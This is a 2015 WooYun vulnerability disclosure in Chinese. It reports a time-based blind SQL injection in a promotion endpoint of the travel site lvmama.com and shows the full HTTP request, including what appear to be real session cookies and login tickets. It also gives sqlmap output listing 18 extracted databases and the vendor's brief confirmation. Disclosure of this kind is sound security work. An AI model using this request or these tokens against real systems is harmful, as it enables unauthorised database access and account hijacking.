当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148153

漏洞标题:驴妈妈旅游网主站SQL注入漏洞(时间盲注/涉及18个数据库)

相关厂商:驴妈妈旅游网

漏洞作者: Xmyth_Xi2oMin9

提交时间:2015-10-20 19:55

修复时间:2015-12-05 13:48

公开时间:2015-12-05 13:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-21: 厂商已经确认,细节仅向厂商公开
2015-10-31: 细节向核心白帽子及相关领域专家公开
2015-11-10: 细节向普通白帽子公开
2015-11-20: 细节向实习白帽子公开
2015-12-05: 细节向公众公开

简要描述:

2333333333333

详细说明:

测试:

POST /zt/promo/mgwq/?action=ajaxCheckMobile HTTP/1.1
Host: www.lvmama.com
Proxy-Connection: keep-alive
Content-Length: 27
Accept: */*
Origin: http://www.lvmama.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.lvmama.com/zt/promo/mgwq/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: uid=wKgKb1YmG41UxnaZAz1HAg==; CoreID6=73792798625714453379994&ci=90409730; _lvTrack_UUID=2FFA9A78-2338-4BE4-9448-F079CDDCEA4A; _lvTrack_sessionID=6D260B9D-2598-4F0B-
811A-976E59550FF5; 
SYEkW4hMTqJfaGco=Fj5FKDOvHiZBTYR7btlDpk9ghbN53E4BTMthMkF29iM4VupTmyTCDnkI9MsPNYHw7AWfuMlMx7wWVQJGmpL3hS9MEGvnSUrmOHl9uRjJXgfD24JpLtJBWIClb1Rcg94e8IJBB9cHFH79%2FSdxt340V540Uc20W
YCyiUAw0mj5iur5xOw9SBkjyNz0jyqpktKJnkcMTzABP5VPJE9ruFNBw4zrdak%2FSlE8bMuKVy%2B1dR8n%2BmryRpu4%2BpatvZyyNyKbJx5DT9oFz99sRC0dTONiUo3ebfbPTdxYdmxaqEDfwxJpm6NR
%2BP8sr0uVlWBJ2K9FBmtPd%2B6t6khHFCKENvISEm38yb580zlZ3NAXEhXmRArdX5uQtfMmiKepVRyLmOyUFT8%2BtYRXBVxMdgZtIzVW8nsh7Hyhi71%2FA0xsnaJYgvgoO11k6nr8mBzNPwISshqPpXcw4McfYYX5jNJ8nJmj8g
%3D%3D16cc39dcca65e7f90e1f02d1f322ed1501d3be6a; jXVJUTNgMEfp6rEr=eSXX2OGbUCoCXrF9lr3xuXxu%2Bt33TfVMiOe6xgKgmNZ3AfH%2FDC144bPAau1S3ovUMg474mwzEMJuCdswF0YdO4BpcFiupqJ3%2FYFcsw1n
%2FlZGxwj%2BGDgxxeGSN%2BMENGgp9LP1ZKcTNsfuMVDtGDjASh68tvT6ma5bJ029a17iNw1QxxbopQdMCa%2B8QKU7frsbXW1ShzFC0eodJTWHcmStPBags9TZYUpF7FtkW%2FF3vwg%2Bgytp5EqwD
%2BUg3ra2hQ5EtqXZCdbN9jHLs6orNzbn7%2ButTboecS2X%2FWikWACODKwann7tZ7k4PrmS2e3FR4p%2Foi6wwtmLyzFcNRr4MC2ue%2BUNtfr%2BSxActDeNQhudGlOe9CzP6bacBSR1hbQQql06HfjEdKlrW
%2BDWQYIR1zQ9Ki4UVzfpTgUIB5O8JuMTNoFuAq9sRJKC0URFSF%2FwP9wgKo4SUUmxYx67pKe2Hpr19w%3D%3Db97762b209c5b460e41258b5c1b115a3fb766523; lvsessionid=10cc77ba-c541-407f-b955-
3000288e680d_10732828; JSESSIONID=98AE09F1D717CA6A4FDD79BF19AEF2BF; ip_from_place_id=1; ip_from_place_name=""; ip_area_location=BJ; ip_location=114.252.85.120; 
ip_province_place_id=110000; ip_city_place_id=110000; ip_city_name=%E5%8C%97%E4%BA%AC; cmTPSet=Y; Rvyz72RO3yiChuCn=VXoKRFQXefZ11UgBCh%2Ba17nfvAnVQx
%2Fe2h1MWVQUgEYjunh4%2B15JCQWVJdDdpWT1ct0iUs1Sb1nvO0cDrjGwv0Ksxa3saz7EGMfuNJ3YLez3yXbkf7ldHpDDDlARpncIbXcVWZSm4HXMqaXr
%2B5UCvPIkaPWtB0XwXyRfld7xdxmOco7E4iEp8elYthMSx4ZgpxCIz5dk%2F7qX7gT5C%2FDEoK1HD2W7YuogWlYXKFpF9Muzi9s%2BkyAEAYuMHBhE
%2FwqqsaJm4SGd2eILPF4N5TZIyerk9pthW9A3ijoEMaEGzxKL2hoLQZkSCdwtKvKMoEtBuNo%2FCezPQs8GEPiI1TlrTxRU1y4maUHI6mvX8WhRkMXnn0NFTpVsKBU2YZ0%2BDKlFFGraEmFB4KOKTuwnEycKaqzYWcQOVW2Z
%2FS7GXJD3phJ7VcYr6OtG4q7XAiTr1fjiM2i1uKhUkghXI4PJ9EwFnQ%3D%3Dd14bfa38b51b2cfd975fd30b5333949444fcb041; __xsptplus443=443.1.1445338000.1445338361.7%234%7C%7C%7C%7C%7C
%23%236dkKcTYNgbppp6W25L04rOaARXBuV7E0%23; 90409730_clogin=v=1&l=1445337999&e=1445340525265; CASTGC=TGC-20-35YOKYZz175Z9pIvPae33gKUBuVWe9AOswh0bno5MJZ0b1Fs3N; 
UN=mtestqingyouawlk%5E%21%5E4028b25b5024472e01502b7213020a7b; unUserName=mtestqingyouawlk; LSTA=792dda8547d49ad39f58801a348ac4a5; ticket=ST-21-XvRElwFkrCc5RU0wtHLM; 
bqeRoYZ7gjxuUl7T=PqpvgpWagDO3wcdVP8dzzS5DoZO%2BjpC%2FMtAQym7JafKv%2BfAmOQcTIGn3rhvAN8qkCVypMZEAVSIP4mzNrg49OWhm4Yli3Km045TH
%2FpSAeuaSKDZ8Z0fGRRnWfRbz2URcyzX4NtVwfWseuE10Sp819UZX2iuwIj8bB508MDG95YAVClCtzwJAJUmFLGOe0%2Fn%2BvkOpRdQrE83%2BdTuaFK0uL%2F
%2FnGFm9KcObvxmFRdfotfaj5WkIkPYq14KaFACeoe3LQOL8m19Gh2rK%2ByTxOInD3guRndQVYNid%2F8uXc47yZOtCjpUAPbkbYPe
%2Fz0e5%2FrdXa8%2FUvOdPXnvxNJsSSoX8yDIB9oNqCxW7q86DmJvBWMTvxAdFDhRKQF4wAUdHgpYuv5fn9biGLp6EjY8GNkueLCmgJ0Pq7ayKfZjrRwGcwqRQAuo%2B9PxkHZkOSjpNT6Ebkdwg7lrBVDQUDgnc%2FgTcFA%3D
%3Da512c691269bdd1987ffa11a102f3c2176a2723f; __utma=30114658.888273037.1445337999.1445337999.1445337999.1; __utmb=30114658.20.10.1445337999; __utmc=30114658; 
__utmz=30114658.1445337999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1445337999; 
Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1445339744; bfd_s=30114658.43119232.1445338000030; tmc=19.30114658.26110505.1445338000053.1445339682649.1445339743968; 
tma=30114658.26110505.1445338000053.1445338000053.1445338000053.1; tmd=19.30114658.26110505.1445338000053.; bfd_g=b26decf4bbcd4bec000062be0002729d56261b8f; 
90409730_clogin=v=1&l=1445337999&e=1445341548801
undefined&value=13800138000

漏洞证明:

1.png


数据库:

available databases [18]:
[*] @ysqk
[*] `i6eorm\\s,om\x03!bhem`
[*] `km`\luyht`
[*] `kmm_mndu`e`
[*] `l`mamabus`
[*] `llm_s`bjects2`
[*] `p`st_ro@ot`
[*] info
[*] infonews
[*] k@l_@eXsa@e
[*] lm@_weather
[*] lmk_logs
[*] lmm_c@stom@zation
[*] lmm_core
[*] lmm_gu0de
[*] lmm_subjec@
[*] minipite
[*] others


1.png


修复方案:

时间盲注 新业务上线 应该是测试下

版权声明:转载请注明来源 Xmyth_Xi2oMin9@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-21 13:46

厂商回复:

thx

最新状态:

暂无